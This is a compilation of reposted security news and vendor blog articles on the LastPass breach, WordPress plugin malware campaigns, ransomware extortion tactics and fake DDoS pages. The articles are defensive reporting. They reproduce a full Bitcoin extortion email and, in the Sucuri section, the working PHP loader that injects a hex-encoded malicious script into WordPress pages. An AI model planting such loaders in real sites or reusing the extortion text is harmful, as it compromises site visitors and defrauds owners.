The LastPass hack saga just keeps getting worse

Already smarting from a breach that stole customer vaults, LastPass has more bad news.

Already smarting from a breach that put partially encrypted login data into a threat actor’s hands, LastPass on Monday said that the same attacker hacked an employee’s home computer and obtained a decrypted vault available to only a handful of company developers.

Although an initial intrusion into LastPass ended on August 12, officials with the leading password manager said the threat actor “was actively engaged in a new series of reconnaissance, enumeration, and exfiltration activity” from August 12 to August 26. In the process, the unknown threat actor was able to steal valid credentials from a senior DevOps engineer and access the contents of a LastPass data vault. Among other things, the vault gave access to a shared cloud-storage environment that contained the encryption keys for customer vault backups stored in Amazon S3 buckets.

“This was accomplished by targeting the DevOps engineer’s home computer and exploiting a vulnerable third-party media software package, which enabled remote code execution capability and allowed the threat actor to implant keylogger malware,” LastPass officials wrote. “The threat actor was able to capture the employee’s master password as it was entered, after the employee authenticated with MFA, and gain access to the DevOps engineer’s LastPass corporate vault.”

The hacked DevOps engineer was one of only four LastPass employees with access to the corporate vault. Once in possession of the decrypted vault, the threat actor exported the entries, including the “decryption keys needed to access the AWS S3 LastPass production backups, other cloud-based storage resources, and some related critical database backups.”

Monday’s update comes two months after LastPass issued a previous bombshell update that for the first time said that, contrary to previous assertions, the attackers had obtained customer vault data containing both encrypted and plaintext data. LastPass said then that the threat actor had also obtained a cloud storage access key and dual storage container decryption keys, allowing for the copying of customer vault backup data from the encrypted storage container.

The backup data contained both unencrypted data, such as website URLs, as well as website usernames and passwords, secure notes, and form-filled data, which had an additional layer of encryption using 256-bit AES. The new details explain how the threat actor obtained the S3 encryption keys.

Monday’s update said that the tactics, techniques, and procedures used in the first incident were different from those used in the second one and that, as a result, it wasn’t initially clear to investigators that the two were directly related. During the second incident, the threat actor used information obtained during the first one to enumerate and exfiltrate the data stored in the S3 buckets.

“Alerting and logging was enabled during these events, but did not immediately indicate the anomalous behavior that became clearer in retrospect during the investigation,” LastPass officials wrote. “Specifically, the threat actor was able to leverage valid credentials stolen from a senior DevOps engineer to access a shared cloud-storage environment, which initially made it difficult for investigators to differentiate between threat actor activity and ongoing legitimate activity.”

LastPass learned of the second incident from Amazon’s warnings of anomalous behavior when the threat actor tried to use Cloud Identity and Access Management (IAM) roles to perform unauthorized activity.

According to a person briefed on a private report from LastPass who spoke on the condition of anonymity, the media software package that was exploited on the employee’s home computer was Plex. Interestingly, Plex reported its own network intrusion on August 24, just 12 days after the second incident commenced. The breach allowed the threat actor to access a proprietary database and make off with password data, usernames, and emails belonging to some of its 30 million customers. Plex is a major provider of media streaming services that allow users to stream movies and audio, play games, and access their own content hosted on home or on-premises media servers.

It’s not clear if the Plex breach has any connection to the LastPass intrusions. Representatives of LastPass and Plex didn’t respond to emails seeking comment for this story.

The threat actor behind the LastPass breach has proven especially resourceful, and the revelation that it successfully exploited a software vulnerability on the home computer of an employee further reinforces that view. As Ars advised in December, all LastPass users should change their master passwords and all passwords stored in their vaults. While it’s not clear whether the threat actor has access to either, the precautions are warranted.

Sources: https://arstechnica.com/information-technology/2023/02/lastpass-hackers-infected-employees-home-computer-and-stole-corporate-vault/

PSA: Your Site Isn’t Hacked By This Bitcoin Scam, Keep the Money

On January 19th, 2023, a member of the Wordfence Threat Intelligence team received an email from their personal blog, claiming the site had been hacked, and we received two reports from Wordfence users who received the same message. The email claimed that the site had been hacked due to a vulnerability on the site. The email went on to demand about $3,000 worth of Bitcoin to prevent the malicious actor from damaging the site’s reputation. This is of course only a scare tactic, and not a true cause for concern. The site was not actually hacked.

This campaign appears to have begun on or around January 18, 2023, and while our data on it is light, the campaign is ongoing. The messages are being sent by a threat actor or a bot they control to submit the message through a contact form on a website. As we do not have data on emails submitted directly through a contact form, this attack campaign is likely to be significantly more prolific than the numbers we have available.

The message in question, which can be seen below in its email form, is a scare tactic that is used to trick victims into paying to prevent a leak of sensitive data, damage to the website, or whatever other potential consequences the vague threat may conjure up in the site owner’s mind.

From: Manie Hedin hacker@sludgepool.org
Subject: Your Site Has Been Hacked

Message Body:
Your Site Has Been Hacked

PLEASE FORWARD THIS EMAIL TO SOMEONE IN YOUR COMPANY WHO IS ALLOWED TO MAKE IMPORTANT DECISIONS!

We have hacked your website https://.com and extracted your databases.

How did this happen?

Our team has found a vulnerability within your site that we were able to exploit. After finding the vulnerability we were able to get your database credentials and extract your entire database and move the information to an offshore server.

What does this mean?

We will systematically go through a series of steps of totally damaging your reputation. First your database will be leaked or sold to the highest bidder which they will use with whatever their intentions are. Next if there are e-mails found they will be e-mailed that their information has been sold or leaked and your https://.com was at fault thusly damaging your reputation and having angry customers/associates with whatever angry customers/associates do. Lastly any links that you have indexed in the search engines will be de-indexed based off of blackhat techniques that we used in the past to de-index our targets.

How do I stop this?

We are willing to refrain from destroying your site’s reputation for a small fee. The current fee is $3000 in bitcoins (0.14 BTC).

The amount(approximately): $3000 (0.14 BTC)
The Address Part 1: bc1qe4xvhksgapl3p76mm
The Address Part 2: fz7thdnmkeuxry08kjhcn

So, you have to manually copy + paste Part1 and Part2 in one string made of 42 characters with no space between the parts that start with “b” and end with “n” is the actually address where you should send the money to.

Once you have paid we will automatically get informed that it was your payment. Please note that you have to make payment within 72 hours after receiving this message or the database leak, e-mails dispatched, and de-index of your site WILL start!

How do I get Bitcoins?

You can easily buy bitcoins via several websites or even offline from a Bitcoin-ATM.

What if I don’t pay?

If you decide not to pay, we will start the attack at the indicated date and uphold it until you do, there’s no counter measure to this, you will only end up wasting more money trying to find a solution. We will completely destroy your reputation amongst google and your customers.

This is not a hoax, do not reply to this email, don’t try to reason or negotiate, we will not read any replies. Once you have paid we will stop what we were doing and you will never hear from us again!

Please note that Bitcoin is anonymous and no one will find out that you have complied.

While this extortion campaign may not pose any real danger, it is still important to take website security seriously. WordPress core, themes, and plugins need to be updated with the latest security updates to patch known vulnerabilities. Even with everything updated, there may be vulnerabilities that are not publicly known and do not have an available patch. For this reason, a website security solution that includes a web application firewall (WAF) that can block common exploits, such as Wordfence, should be implemented.

Cyber Observables
While this extortion campaign is still in its early stages, there are some observables that can be used to identify and block these extortion attempts.

Email Address
hacker@sludgepool[.]org

Bitcoin Address
bc1qe4xvhksgapl3p76mmfz7thdnmkeuxry08kjhcn

IP Addresses
138.199.18.140
138.199.18.61
212.102.57.5
216.24.216.249
212.102.57.24

Conclusion
In this post, we discussed an emerging extortion campaign where emails are being sent to site owners through contact forms. This campaign does not pose an actual threat to the website, but serves as a reminder to keep websites updated and implement a website security solution.

Source: https://www.wordfence.com/blog/2023/01/psa-your-site-isnt-hacked-by-this-bitcoin-scam-keep-the-money/

Hundreds of WordPress sites infected by recently discovered backdoor

People who use WordPress should check their sites for unpatched plugins.

Malware that exploits unpatched vulnerabilities in 30 different WordPress plugins has infected hundreds if not thousands of sites and may have been in active use for years, according to a writeup published last week.

The Linux-based malware installs a backdoor that causes infected sites to redirect visitors to malicious sites, researchers from security firm Dr.Web said. It’s also able to disable event logging, go into standby mode, and shut itself down. It gets installed by exploiting already-patched vulnerabilities in plugins that website owners use to add functionality like live chat or metrics-reporting to the core WordPress content management system.

“If sites use outdated versions of such add-ons, lacking crucial fixes, the targeted web pages are injected with malicious JavaScripts,” Dr.Web researchers wrote. “As a result, when users click on any area of an attacked page, they are redirected to other sites.”

Searches such as this one indicate that more than 1,300 sites contain the JavaScript that powers the backdoor. It’s possible that some of those sites have removed the malicious code since the last scan. Still, it provides an indication of the reach of the malware.

The plugins exploited include:

WP Live Chat Support Plugin
WordPress – Yuzo Related Posts
Yellow Pencil Visual Theme Customizer Plugin
Easysmtp
WP GDPR Compliance Plugin
Newspaper Theme on WordPress Access Control (vulnerability CVE-2016-10972)
Thim Core
Google Code Inserter
Total Donations Plugin
Post Custom Templates Lite
WP Quick Booking Manager
Facebook Live Chat by Zotabox
Blog Designer WordPress Plugin
WordPress Ultimate FAQ (vulnerabilities CVE-2019-17232 and CVE-2019-17233)
WP-Matomo Integration (WP-Piwik)
WordPress ND Shortcodes For Visual Composer
WP Live Chat
Coming Soon Page and Maintenance Mode
Hybrid
Brizy WordPress Plugin
FV Flowplayer Video Player
WooCommerce
WordPress Coming Soon Page
WordPress theme OneTone
Simple Fields WordPress Plugin
WordPress Delucks SEO plugin
Poll, Survey, Form & Quiz Maker by OpinionStage
Social Metrics Tracker
WPeMatico RSS Feed Fetcher
Rich Reviews plugin

“If one or more vulnerabilities are successfully exploited, the targeted page is injected with a malicious JavaScript that is downloaded from a remote server,” the Dr.Web writeup explained. “With that, the injection is done in such a way that when the infected page is loaded, this JavaScript will be initiated first—regardless of the original contents of the page. At this point, whenever users click anywhere on the infected page, they will be transferred to the website the attackers need users to go to.”

The JavaScript contains links to a variety of malicious domains, including:

lobbydesires[.]com
letsmakeparty3[.]ga
deliverygoodstrategies[.]com
gabriellalovecats[.]com
css[.]digestcolect[.]com
clon[.]collectfasttracks[.]com
Count[.]trackstatisticsss[.]com


The researchers found two versions of the backdoor: Linux.BackDoor.WordPressExploit.1 and Linux.BackDoor.WordPressExploit.2. They said the malware may have been in use for three years.

WordPress plugins have long been a common means for infecting sites. While the security of the main application is fairly robust, many plugins are riddled with vulnerabilities that can lead to infection. Criminals use infected sites to redirect visitors to sites used for phishing, ad fraud, and distributing malware.

People running WordPress sites should ensure that they’re using the most current versions of the main software as well as any plugins. They should prioritize updating any of the plugins listed above.

Source: https://arstechnica.com/information-technology/2023/01/hundreds-of-wordpress-sites-infected-by-recently-discovered-backdoor/

New Linux malware uses 30 plugin exploits to backdoor WordPress sites

A previously unknown Linux malware has been exploiting 30 vulnerabilities in multiple outdated WordPress plugins and themes to inject malicious JavaScript.

According to a report by antivirus vendor Dr. Web, the malware targets both 32-bit and 64-bit Linux systems, giving its operator remote command capabilities.

The main functionality of the trojan is to hack WordPress sites using a set of hardcoded exploits that are run successively, until one of them works.

The targeted plugins and themes are the following:

  • WP Live Chat Support Plugin
  • WordPress – Yuzo Related Posts
  • Yellow Pencil Visual Theme Customizer Plugin
  • Easysmtp
  • WP GDPR Compliance Plugin
  • Newspaper Theme on WordPress Access Control (CVE-2016-10972)
  • Thim Core
  • Google Code Inserter
  • Total Donations Plugin
  • Post Custom Templates Lite
  • WP Quick Booking Manager
  • Faceboor Live Chat by Zotabox
  • Blog Designer WordPress Plugin
  • WordPress Ultimate FAQ (CVE-2019-17232 and CVE-2019-17233)
  • WP-Matomo Integration (WP-Piwik)
  • WordPress ND Shortcodes For Visual Composer
  • WP Live Chat
  • Coming Soon Page and Maintenance Mode
  • Hybrid

If the targeted website runs an outdated and vulnerable version of any of the above, the malware automatically fetches malicious JavaScript from its command and control (C2) server, and injects the script into the website site.

Infected pages act as redirectors to a location of the attacker’s choosing, so the scheme works best on abandoned sites.

These redirections may serve in phishing, malware distribution, and malvertising campaigns to help evade detection and blocking. That said, the operators of the auto-injector might be selling their services to other cybercriminals.

An updated version of the payload that Dr. Web observed in the wild also targets the following WordPress add-ons:

  • Brizy WordPress Plugin
  • FV Flowplayer Video Player
  • WooCommerce
  • WordPress Coming Soon Page
  • WordPress theme OneTone
  • Simple Fields WordPress Plugin
  • WordPress Delucks SEO plugin
  • Poll, Survey, Form & Quiz Maker by OpinionStage
  • Social Metrics Tracker
  • WPeMatico RSS Feed Fetcher
  • Rich Reviews plugin

The new add-ons targeted by the new variant indicate that the development of the backdoor is active at the moment.

Dr. Web also mentions that both variants contain functionality that is currently inactive, which would allow brute-forcing attacks against website administrator accounts.

Defending against this threat requires admins of WordPress websites to update to the latest available version the themes and plugins running on the site and replace those that are no longer developed with alternatives that being supported.

Using strong passwords and activating the two-factor authentication mechanism should help ensure protection against brute-force attacks.

Source: https://www.bleepingcomputer.com/news/security/new-linux-malware-uses-30-plugin-exploits-to-backdoor-wordpress-sites/

New Ransom Payment Schemes Target Executives, Telemedicine

Ransomware groups are constantly devising new methods for infecting victims and convincing them to pay up, but a couple of strategies tested recently seem especially devious. The first centers on targeting healthcare organizations that offer consultations over the Internet and sending them booby-trapped medical records for the “patient.” The other involves carefully editing email inboxes of public company executives to make it appear that some were involved in insider trading.

Alex Holden is founder of Hold Security, a Milwaukee-based cybersecurity firm. Holden’s team gained visibility into discussions among members of two different ransom groups: CLOP (a.k.a. “Cl0p” a.k.a. “TA505“), and a newer ransom group known as Venus.

Last month, the U.S. Department of Health and Human Services (HHS) warned that Venus ransomware attacks were targeting a number of U.S. healthcare organizations. First spotted in mid-August 2022, Venus is known for hacking into victims’ publicly-exposed Remote Desktop services to encrypt Windows devices.

Holden said the internal discussions among the Venus group members indicate this gang has no problem gaining access to victim organizations.

“The Venus group has problems getting paid,” Holden said. “They are targeting a lot of U.S. companies, but nobody wants to pay them.”

Which might explain why their latest scheme centers on trying to frame executives at public companies for insider trading charges. Venus indicated it recently had success with a method that involves carefully editing one or more email inbox files at a victim firm — to insert messages discussing plans to trade large volumes of the company’s stock based on non-public information.

“We imitate correspondence of the [CEO] with a certain insider who shares financial reports of his companies through which your victim allegedly trades in the stock market, which naturally is a criminal offense and — according to US federal laws [includes the possibility of up to] 20 years in prison,” one Venus member wrote to an underling.

“You need to create this file and inject into the machine(s) like this so that metadata would say that they were created on his computer,” they continued. “One of my clients did it, I don’t know how. In addition to pst, you need to decompose several files into different places, so that metadata says the files are native from a certain date and time rather than created yesterday on an unknown machine.”

Holden said it’s not easy to plant emails into an inbox, but it can be done with Microsoft Outlook .pst files, which the attackers may also have access to if they’d already compromised a victim network.

“It’s not going to be forensically solid, but that’s not what they care about,” he said. “It still has the potential to be a huge scandal — at least for a while — when a victim is being threatened with the publication or release of these records.”

The Venus ransom group’s extortion note. Image: Tripwire.com

Holden said the CLOP ransomware gang has a different problem of late: Not enough victims. The intercepted CLOP communication seen by KrebsOnSecurity shows the group bragged about twice having success infiltrating new victims in the healthcare industry by sending them infected files disguised as ultrasound images or other medical documents for a patient seeking a remote consultation.

The CLOP members said one tried-and-true method of infecting healthcare providers involved gathering healthcare insurance and payment data to use in submitting requests for a remote consultation on a patient who has cirrhosis of the liver.

“Basically, they’re counting on doctors or nurses reviewing the patient’s chart and scans just before the appointment,” Holden said. “They initially discussed going in with cardiovascular issues, but decided cirrhosis or fibrosis of the liver would be more likely to be diagnosable remotely from existing test results and scans.”

While CLOP as a money making collective is a fairly young organization, security experts say CLOP members hail from a group of Threat Actors (TA) known as “TA505,” which MITRE’s ATT&CK database says is a financially motivated cybercrime group that has been active since at least 2014. “This group is known for frequently changing malware and driving global trends in criminal malware distribution,” MITRE assessed.

In April, 2021, KrebsOnSecurity detailed how CLOP helped pioneer another innovation aimed at pushing more victims into paying an extortion demand: Emailing the ransomware victim’s customers and partners directly and warning that their data would be leaked to the dark web unless they can convince the victim firm to pay up.

Security firm Tripwire points out that the HHS advisory on Venus says multiple threat actor groups are likely distributing the Venus ransomware. Tripwire’s tips for all organizations on avoiding ransomware attacks include:

  • Making secure offsite backups.
  • Running up-to-date security solutions and ensuring that your computers are protected with the latest security patches against vulnerabilities.
  • Using hard-to-crack unique passwords to protect sensitive data and accounts, as well as enabling multi-factor authentication.
  • Encrypting sensitive data wherever possible.
  • Continuously educating and informing staff about the risks and methods used by cybercriminals to launch attacks and steal data.

While the above tips are important and useful, one critical area of ransomware preparedness overlooked by too many organizations is the need to develop — and then periodically rehearse — a plan for how everyone in the organization should respond in the event of a ransomware or data ransom incident. Drilling this breach response plan is key because it helps expose weaknesses in those plans that could be exploited by the intruders.

As noted in last year’s story Don’t Wanna Pay Ransom Gangs? Test Your Backups, experts say the biggest reason ransomware targets and/or their insurance providers still pay when they already have reliable backups of their systems and data is that nobody at the victim organization bothered to test in advance how long this data restoration process might take.

“Suddenly the victim notices they have a couple of petabytes of data to restore over the Internet, and they realize that even with their fast connections it’s going to take three months to download all these backup files,” said Fabian Wosar, chief technology officer at Emsisoft. “A lot of IT teams never actually make even a back-of-the-napkin calculation of how long it would take them to restore from a data rate perspective.”

Source: https://krebsonsecurity.com/2022/12/new-ransom-payment-schemes-target-executives-telemedicine/

Infected WordPress Plugins Redirect to Push Notification Scam

Attackers are always finding unique ways to avoid detection. Our teams regularly find malware on compromised websites which have been obfuscated to make it more difficult for webmasters to detect or understand. Obfuscation can take many forms, such as encrypting code or using complex algorithms to hide the true nature of the malicious contents. For example, many malware samples we detect are encoded into base64 to confuse website owners and evade detection.

But during a recent investigation, I stumbled across a rather interesting piece of malware using a more complex form of obfuscation. Instead of leveraging the typical base64 encoding to evade detection, the attacker was adding variations of a PHP function to normal plugin files which decoded hex2dec from a second file containing a hexadecimal payload.

Let’s take a closer look.

Unwanted redirects to fake captcha scam

A new client was complaining that whenever a site visitor clicked anywhere on their website, a browser tab was opened which redirected the victim to the following spammy web page: hxxps://1.guesswhatnews[.]com/not-a-robot/index.html

Redirect to push notification scam with fake captcha
Fake captcha displayed to redirected website visitors.

The spam website was resolving to an IP address https://urlscan.io/ip/45.133.44.20 employed by a shady ad network mainly used for porn websites.

An inspection of the compromised web page revealed a malicious JavaScript injection as the source of the redirect, which had been injected into random plugin files on the compromised website.

Malicious JavaScript injected into WordPress plugins via _inc.tmp

As it turns out, our remediation teams have recently noticed an influx of tickets for WordPress websites that have the following code injected into random plugins:

if ((is_admin() || (function_exists('get_hex_cache'))) !== true) {
        add_action('wp_head', 'get_hex_cache', 12);

        function get_hex_cache()
        {
            return print(@hex2bin( '3c7' . (file_get_contents(__DIR__  .'/_inc.tmp'))));
        }
    }

This PHP code injects the decoded contents of _inc.tmp (found in the same plugin directory) into the header section of the site’s WordPress pages.

To accomplish this, it adds the get_hex_cache function to the wp_head hook. This hook is only added once, even when more than one plugin is infected. It’s also worth noting that the malware is not activated for site administrators.

The _inc.tmp file contains a 51Kb-long sequence of digits:

The _inc.tmp file containing 51Kb-long sequence of digits:

It’s a hexadecimally encoded binary string. The malware appends 3c7 at the beginning of the string and decodes using the hex2bin PHP function.

The decoded results contain a <script> tag populated with obfuscated JavaScript code, which is injected into WordPress pages.

Example of the injected malicious JavaScript
Example of the injected script

The code begins with “function _0x18b4(){const _0x188f70=”. And yet another interesting feature of this injection is the data-group=”lists” parameter of the script tag. A quick check with PublicWWW revealed over 170 websites infected with this particular piece of malware (at the time of writing).

Furthermore, the script adds a listener to the whole page’s onclick event. Whenever a site visitor clicks on any link, it changes the link to hxxps://1.guesswhatnews[.]com/not-a-robot/index.html?var=siteid&ymid=clickid&rc=0&mrc=3&fsc=0&zoneid=1947429&tbz=1947431

Evading detection from dev tools

To hide the malicious activity from prying eyes, the script doesn’t do anything if it detects open Developer Tools. We’ve seen this behavior quite often in MageCart malware, however this script uses a more complex approach to detecting dev tools which relies on multiple alternative methods.

Here is a list of some of the function names this malware uses to make these checks:

  • checkByImageMethod
  • checkDevByScreenResize
  • detectDevByKeyboard
  • checkByFirebugMethod
  • checkByProfileMethod
Malware detects developer tools

Whenever the malware detects that dev tools are enabled, then the redirect doesn’t occur and malicious behavior is much harder to find upon inspection.

Mitigation Steps

Obfuscation can make it challenging for website owners to detect or pinpoint the source of malicious behavior on their website. Fortunately, a number of free and paid tools exist to help monitor for indicators of compromise.

Let’s take a look at some of the ways you can mitigate risk of infection for your website.

  • Scan your website for malware regularly and keep an eye out for infections at both the client and server level.
  • Install the latest software updates and patches for your website as soon as they become available. That includes core CMS, plugins, themes, and other extensible components.
  • Leverage a web application firewall to virtually patch known vulnerabilities, block bad bots, and mitigate brute force attacks.
  • Harden your website by restricting access to admin pages and using strong, unique passwords for all of your website’s accounts.
  • Use file integrity monitoring to detect any unexpected changes in your environment.

Source: https://blog.sucuri.net/2022/12/infected-wordpress-plugins-redirect-to-push-notification-scam.html

Researchers Find Backdoor in School Management Plugin for WordPress

Multiple versions of a WordPress plugin by the name of “School Management Pro” harbored a backdoor that could grant an adversary complete control over vulnerable websites.

The issue, spotted in premium versions before 9.9.7, has been assigned the CVE identifier CVE-2022-1609 and is rated 10 out of 10 for severity.

The backdoor, which is believed to have existed since version 8.9, enables “an unauthenticated attacker to execute arbitrary PHP code on sites with the plugin installed,” Jetpack’s Harald Eilertsen said in a Friday write-up.

School Management, developed by an India-based company called Weblizar, is billed as a WordPress add-on to “manage complete school operation.” It also claims more than 340,000 customers of its premium and free WordPress themes and plugins.

The WordPress security company noted that it uncovered the implant on May 4 after it was alerted to the presence of heavily obfuscated code in the license-checking code of the plugin. The free version of School Management, which doesn’t pack the licensing code, is not impacted.

While the backdoor has since been removed, the exact origins of the compromise remains unclear, with the vendor stating that “they do not know when or how the code came into their software.”

Customers of the plugin are recommended to update to the latest version to prevent active exploitation attempts.

Source: https://thehackernews.com/2022/05/researchers-find-backdoor-in-school.html

Over 15,000 WordPress Sites Compromised in Malicious SEO Campaign

A new malicious campaign has compromised over 15,000 WordPress websites in an attempt to redirect visitors to bogus Q&A portals.

“These malicious redirects appear to be designed to increase the authority of the attacker’s sites for search engines,” Sucuri researcher Ben Martin said in a report published last week, calling it a “clever black hat SEO trick.”

The search engine poisoning technique is designed to promote a “handful of fake low quality Q&A sites” that share similar website-building templates and are operated by the same threat actor.

A notable aspect of the campaign is the ability of the hackers to modify over 100 files per website on average, an approach that contrasts dramatically from other attacks of this kind wherein only a limited number of files are tampered with to reduce footprint and escape detection.

Some of the most commonly infected pages consist of wp-signup.php, wp-cron.php, wp-links-opml.php, wp-settings.php, wp-comments-post.php, wp-mail.php, xmlrpc.php, wp-activate.php, wp-trackback.php, and wp-blog-header.php.

This extensive compromise allows the malware to execute the redirects to websites of the attacker’s choice. It’s worth pointing out that the redirects don’t occur if the wordpress_logged_in cookie is present or if the current page is wp-login.php (i.e., the login page) so as to avoid raising suspicion.

The ultimate goal of the campaign is to “drive more traffic to their fake sites” and “boost the sites’ authority using fake search result clicks to make Google rank them better so that they get more real organic search traffic.”

The injected code achieves this by initiating a redirect to a PNG image hosted on a domain named “ois[.]is” that, instead of loading an image, takes the website visitor to a Google search result URL of a spam Q&A domain.

It’s not immediately clear how the WordPress sites are breached, and Sucuri said it did not notice any obvious plugin flaws being exploited to carry out the campaign.

That said, it’s suspected to be a case of brute-forcing the WordPress administrator accounts, making it essential that users enable two-factor authentication and ensure that all software is up-to-date.

Source: https://thehackernews.com/2022/11/over-15000-wordpress-sites-compromised.html

Fake DDoS protection pages on compromised WordPress sites lead to malware infections

Threat actors compromise WordPress sites to display fake Cloudflare DDoS protection pages to distribute malware.

DDoS Protection pages are associated with browser checks performed by WAF/CDN services which verify if the site visitor is a human or a bot.

Recently security experts from Sucuri, spotted JavaScript injections targeting WordPress sites to display fake DDoS Protection pages which lead victims to download remote access trojan malware.

“Unfortunately, attackers have begun leveraging these familiar security assets in their own malware campaigns. We recently discovered a malicious JavaScript injection affecting WordPress websites which results in a fake CloudFlare DDoS protection popup.” reads the post published by Sucuri.

fake ddos protection page prompt _prompt-768x178

The page above requests that the visitor clicks on a button to bypass the DDoS protection and visit the site. However, upon clicking on the button, the ‘security_install.iso’ file is downloaded to the visitor’s machine. The file poses as a tool required to bypass the DDoS verification. In order to trick the visitors into opening the file, a new message tells them that the verification code to access the website is contained in the file.

fake ddos protection page prompt 2

Upon opening the file, the image file is mounted and its content is shown to the visitors. The mounted drive contains a file called security_install.exe, which is actually a Windows shortcut that runs a PowerShell command contained in the debug.txt file in the same drive.

Launching the security_install.exe, the infection chain starts while a fake DDoS code is displayed.

Ultimately, this causes a chain of scripts to run that display the fake DDoS code needed to view the site. The process leads to the installation of the NetSupport RAT remote access trojan.

The scripts will also infect the victim’s computer with the Raccoon Stealer info-stealing trojan which allows operators to steal login credentials, cookies, auto-fill data, and credit cards saved on web browsers, along with cryptocurrency wallets.

Website owners are recommended to:

  • Keep all software on your website up to date
  • Use strong passwords
  • Use 2FA on your administrative panel
  • Place your website behind a firewall service

while below are the recommendations for regular website visitors:

  • Make sure your computer is running a robust antivirus program
  • Place 2FA on all important logins (such as your bank, social media)
  • Practice good browsing habits; don’t open strange files!
  • Keep your browser and all software on your computer updated/patched
  • Use a script blocker in your browser (advanced)

Source: https://securityaffairs.co/134686/hacking/fake-ddos-protection-pages-wordpress.html

Smart homes are hackable homes if not equipped with updated, supported tech

Smart homes are increasingly becoming hackable homes, according to consumer research.

The report by consumer rights organization Which? paints a grim picture for people who have equipped their residences with gadgets, many from trusted tech names.

As with pretty much everything in IT, if you connect a device to the internet, ensuring it’s patched and has a decent password is the very least owners can do. Even then, there are no guarantees that this is secure.

Unsurprisingly, the Which? team found that out-of-support devices were relatively straightforward for hackers to compromise. The example of an early Amazon Echo smart speaker was given where researchers were able to take control without the user being aware.

Other devices, such as smartphones and routers, were also exploited. The Which? team were able to infect a Samsung Galaxy S8 smartphone with malware disguised as a delivery text. Siphoning of user data was then possible.

However, in these cases the devices were out of support and “the attack would have been better blocked or detected by a device that was still receiving security updates,” Which? noted.

Continue Reading: https://www.theregister.com/2022/06/01/which_smart_tech_advice/